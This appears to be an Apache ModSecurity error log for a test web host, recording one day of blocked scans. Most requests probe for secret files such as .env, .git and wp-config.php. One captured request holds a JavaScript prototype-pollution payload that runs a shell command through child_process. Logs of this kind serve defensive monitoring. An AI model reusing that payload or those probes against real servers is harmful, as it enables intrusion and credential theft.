[Thu Jan 08 07:31:36.846391 2026] [:error] [pid 1270042] [client 15.161.54.129:45104] [client 15.161.54.129] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV9PSC7RlX2cRjHcFz6w-QAAAAY"]
[Thu Jan 08 07:31:36.846559 2026] [:error] [pid 1270042] [client 15.161.54.129:45104] [client 15.161.54.129] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV9PSC7RlX2cRjHcFz6w-QAAAAY"]
[Thu Jan 08 12:07:38.815772 2026] [:error] [pid 1270041] [client 18.119.100.98:52770] [client 18.119.100.98] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: ${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}} found within ARGS:0: {then: $1:__proto__:then status: resolved_model reason: -1 value: {then:$b1337} _response: {_prefix: var res=process.mainmodule.require(child_process).execsync(echo vuln_test_123456 | base64 -w 0).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks: $q2 _formdata: {get: $1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV-P-s3GwEx_BV8-CrWTegAAAAU"]
[Thu Jan 08 12:07:38.816415 2026] [:error] [pid 1270041] [client 18.119.100.98:52770] [client 18.119.100.98] ModSecurity: Warning. Pattern match "(?i)[\\\\s\\\\S]((?:x(?:link:href|html|mlns)|!ENTITY.*?(?:SYSTEM|PUBLIC)|data:text\\\\/html|formaction|\\\\@import|base64)\\\\b|pattern\\\\b.*?=)" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-941-APPLICATION-ATTACK-XSS.conf"] [line "149"] [id "941130"] [msg "XSS Filter - Category 3: Attribute Vector"] [data "Matched Data: base64 found within ARGS:0: {\\x22then\\x22: \\x22$1:__proto__:then\\x22, \\x22status\\x22: \\x22resolved_model\\x22, \\x22reason\\x22: -1, \\x22value\\x22: \\x22{\\x22then\\x22:\\x22$B1337\\x22}\\x22, \\x22_response\\x22: {\\x22_prefix\\x22: \\x22var res=process.mainModule.require('child_process').execSync('echo VULN_TEST_123456 | base64 -w 0').toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'),{digest: `NEXT_REDIRECT;push;/login?a=${res};307;`});\\x22, \\x22_chunks\\x22: \\x22$Q2\\x22, \\x22_formData\\..."] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-xss"] [tag "OWASP_CRS"] [tag "OWASP_CRS/W [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV-P-s3GwEx_BV8-CrWTegAAAAU"]
[Thu Jan 08 12:07:38.817809 2026] [:error] [pid 1270041] [client 18.119.100.98:52770] [client 18.119.100.98] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV-P-s3GwEx_BV8-CrWTegAAAAU"]
[Thu Jan 08 12:07:38.818000 2026] [:error] [pid 1270041] [client 18.119.100.98:52770] [client 18.119.100.98] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=5,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aV-P-s3GwEx_BV8-CrWTegAAAAU"]
[Thu Jan 08 12:26:16.768276 2026] [authz_core:error] [pid 1270039] [client 54.166.160.14:48968] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 08 17:22:33.419726 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNkAAAAAI"]
[Thu Jan 08 17:22:33.419983 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNkAAAAAI"]
[Thu Jan 08 17:22:33.420131 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNkAAAAAI"]
[Thu Jan 08 17:22:33.738719 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNmAAAAAI"]
[Thu Jan 08 17:22:33.738905 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNmAAAAAI"]
[Thu Jan 08 17:22:33.739071 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNmAAAAAI"]
[Thu Jan 08 17:22:33.760586 2026] [authz_core:error] [pid 1270037] [client 195.178.110.132:60576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Thu Jan 08 17:22:33.783455 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aV_ZyeA_IfWyU2EIiRhNmgAAAAI"]
[Thu Jan 08 17:22:33.783646 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aV_ZyeA_IfWyU2EIiRhNmgAAAAI"]
[Thu Jan 08 17:22:33.783782 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aV_ZyeA_IfWyU2EIiRhNmgAAAAI"]
[Thu Jan 08 17:22:33.805296 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNmwAAAAI"]
[Thu Jan 08 17:22:33.805470 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNmwAAAAI"]
[Thu Jan 08 17:22:33.805606 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/backend/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNmwAAAAI"]
[Thu Jan 08 17:22:33.828248 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNnAAAAAI"]
[Thu Jan 08 17:22:33.828413 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNnAAAAAI"]
[Thu Jan 08 17:22:33.828550 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/admin/.env"] [unique_id "aV_ZyeA_IfWyU2EIiRhNnAAAAAI"]
[Thu Jan 08 17:22:33.854122 2026] [authz_core:error] [pid 1270037] [client 195.178.110.132:60576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Thu Jan 08 17:22:33.878153 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aV_ZyeA_IfWyU2EIiRhNngAAAAI"]
[Thu Jan 08 17:22:33.878376 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aV_ZyeA_IfWyU2EIiRhNngAAAAI"]
[Thu Jan 08 17:22:33.878537 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php"] [unique_id "aV_ZyeA_IfWyU2EIiRhNngAAAAI"]
[Thu Jan 08 17:22:33.899961 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aV_ZyeA_IfWyU2EIiRhNnwAAAAI"]
[Thu Jan 08 17:22:33.900077 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aV_ZyeA_IfWyU2EIiRhNnwAAAAI"]
[Thu Jan 08 17:22:33.900252 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aV_ZyeA_IfWyU2EIiRhNnwAAAAI"]
[Thu Jan 08 17:22:33.900384 2026] [:error] [pid 1270037] [client 195.178.110.132:60576] [client 195.178.110.132] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.old"] [unique_id "aV_ZyeA_IfWyU2EIiRhNnwAAAAI"]
[Thu Jan 08 17:22:33.958572 2026] [authz_core:error] [pid 1270037] [client 195.178.110.132:60576] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config.php.bak
[Thu Jan 08 18:22:51.312725 2026] [:error] [pid 1270039] [client 45.148.10.158:1116] [client 45.148.10.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_n65ccQYhM1DUhi_W6LAAAAAQ"]
[Thu Jan 08 18:22:51.312958 2026] [:error] [pid 1270039] [client 45.148.10.158:1116] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_n65ccQYhM1DUhi_W6LAAAAAQ"]
[Thu Jan 08 18:22:51.313132 2026] [:error] [pid 1270039] [client 45.148.10.158:1116] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aV_n65ccQYhM1DUhi_W6LAAAAAQ"]
[Thu Jan 08 18:22:53.715553 2026] [:error] [pid 1270042] [client 45.148.10.158:32664] [client 45.148.10.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aV_n7S7RlX2cRjHcFz6xRQAAAAY"]
[Thu Jan 08 18:22:53.715819 2026] [:error] [pid 1270042] [client 45.148.10.158:32664] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aV_n7S7RlX2cRjHcFz6xRQAAAAY"]
[Thu Jan 08 18:22:53.716854 2026] [:error] [pid 1270042] [client 45.148.10.158:32664] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.local"] [unique_id "aV_n7S7RlX2cRjHcFz6xRQAAAAY"]
[Thu Jan 08 18:22:55.449141 2026] [:error] [pid 1270038] [client 45.148.10.158:32700] [client 45.148.10.158] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aV_n7xmwMJtANIcuNUXopwAAAAM"]
[Thu Jan 08 18:22:55.449369 2026] [:error] [pid 1270038] [client 45.148.10.158:32700] [client 45.148.10.158] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aV_n7xmwMJtANIcuNUXopwAAAAM"]
[Thu Jan 08 18:22:55.449553 2026] [:error] [pid 1270038] [client 45.148.10.158:32700] [client 45.148.10.158] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aV_n7xmwMJtANIcuNUXopwAAAAM"]
